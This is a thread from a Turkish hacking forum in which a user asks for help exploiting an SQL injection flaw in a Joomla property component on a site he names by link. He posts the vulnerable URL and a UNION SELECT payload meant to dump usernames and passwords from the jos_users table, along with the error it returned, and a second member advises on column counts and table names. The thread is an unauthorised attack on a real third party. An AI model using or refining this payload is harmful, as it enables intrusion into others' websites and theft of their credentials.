SQL injection yardım

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

kozmon

Katılımcı Üye
30 Kas 2008
470
0
Sakarya
arkadaşlar bi site buldum

https://tik.lat/00NpC

sitede açık var
http:/Site/index.php?option=com_property&show=property&property=1[SQL]

site yukarıdaki url ile hackleniyormuş ama sql yazan yere ne yazcam
ne işe yarar nasıl çalışır yardımlarınızı bekliyorum

bide ben sql yazan yere
-9999+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--
internette bulduğum yukaridaki kodu yazdım ve şöyle bir hata çıktı

Unable to Execute Query. Table 'mydomains_10352.jos_users' doesn't exist

bu hata mıdır anlamı nedir veya oradaki 'mydomains_10352.jos_users' yerleri admin şifresi falanmı
 
Son düzenleme:

DreaMHunteR

Kıdemli Üye
27 Ağu 2009
3,131
0
Eskişehir
ya db ismi değişik yada exploit ;) mesela senin verdiğin exploitteki tablo sayısı 17 ama ben siteninkini 3 buldum =) he o sql yazan yerede verilmişse sql exploitini verilmemişse sql komutlarını sen yazacaksın
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.